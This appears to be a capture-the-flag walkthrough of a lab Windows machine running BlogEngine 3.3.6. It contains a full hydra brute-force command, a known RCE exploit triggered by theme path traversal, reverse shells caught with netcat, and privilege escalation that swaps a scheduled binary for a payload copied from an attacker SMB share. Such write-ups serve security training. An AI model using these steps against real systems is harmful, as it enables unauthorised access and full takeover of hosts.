HackPack
Difficulty: Eazy
Score: 3/10
Target
- 2 flags
- system privilege
Process
Enumeration
Running nmap
nmap -sC -sV -o nmap.txt -Pn 10.10.45.21
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2020-07-29T16:16:07+00:00; +1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsWe see that port 80 is open, checking it we see a picture of pennywise:
Going through the menu , a login page is found running blogengine.net
In order to login we are going to bruteforce with hydra, using admin as user
We can also brute-force with brupsuite
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.79.241 http-post-form "/Account/login.aspx:__VIEWSTATE=ScTUsDEL61RxXQbUkxPIvjWwWIPtRoGua7VlvlhkXMv83IlH8nDZNBJap5qDDRHYpohgQkDHiy%2FBC%2BxgOpa%2BQyclcuurGR6oEQrtrgMMab51BRVITHbw51etTYHg%2BOSqlTEdhO1sq6LyFJ6OiiTP6d9DJf02wqbnAd2tPNuj2XvUivov&__EVENTVALIDATION=IwDYcG9QBNf8p2xPKx%2B%2Fw5JxMDpBvm8H7wN1ksA5dw9A8UBpnwOCo0Dw%2BPk5zNJmkB9lQ%2FliisMfMuMuK0XXTqgvEqLeivDFKIVc5TL58r9bwhfN6No%2FVNcCXAAYsaZZOdkMyqjZVNaOltsfMh1u4e0p9aFSTmWecZYwxusByDyG%2FSae&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login Failed" -t 64
[80][http-post-form] host: 10.10.79.241 login: admin password: ******
1 of 1 target successfully completed, 1 valid password foundWith the credentials obtained (according to writeup rules the password canĀ“t be shown) we access to the CMS and see that the machine is running Blogengine version 3.3.6
Exploitation
Doing a quick search for exploits, I found the following RCE vulnerability : https://www.exploit-db.com/exploits/46353
In order to obtain a reverse shell, we need to copy that code to a file name PostView.ascx, then browsing to http://IP/admin/app/editor/editpost.cshtml to upload the file
To trigger the reverse shell we need to browse to http://IP/?theme=../../App_Data/files
Checking netcat , we obtain a reverse connection
nc -lvnp 443
listening on [any] 443 ...
connect to [10.11.14.106] from (UNKNOWN) [10.10.79.241] 49326
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved
c:\windows\system32\inetsrv>whoami
iis apppool\blogPrivilege Escalation
For this part we are going to use an enumeration tool called WinPEAS : https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Transfer the binary file with Netcat or python
After reading all colored output of winPEAS , I found this uncommon binary
WindowsScheduler(Splinterware Software Solutions - System Scheduler Service)[C:\PROGRA~2\SYSTEM~1\WService.exe] - Auto - Running
Possible DLL Hijacking in binary folder: C:\Program Files (x86)\SystemScheduler (Everyone [WriteData/CreateFiles])Going to that directory, we found the following log file:
08/07/20 04:06:34,Process Ended. PID:480,ExitCode:4,Message.exe (Administrator)
08/07/20 04:07:02,Event Started Ok, (Administrator)
08/07/20 04:07:33,Process Ended. PID:2420,ExitCode:4,Message.exe (Administrator)
08/07/20 04:08:02,Event Started Ok, (Administrator)
08/07/20 04:08:33,Process Ended. PID:800,ExitCode:4,Message.exe (Administrator)it will execute the Message.exe automacally per 30 sec
Transfer the shell to victim machine
We first rename Message.exe and then upload our reverse shell
C:\Program Files (x86)\SystemScheduler>ren Message.exe Message.exe.bak
C:\Program Files (x86)\SystemScheduler>copy \\10.11.14.106\smbfolder\Message.exe
1 file(s) copied.Finally, after a few seconds we obtain a reverse connection as Administrator
nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.11.14.106] from (UNKNOWN) [10.10.79.241] 49517
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\>whoami
hackpark\administrator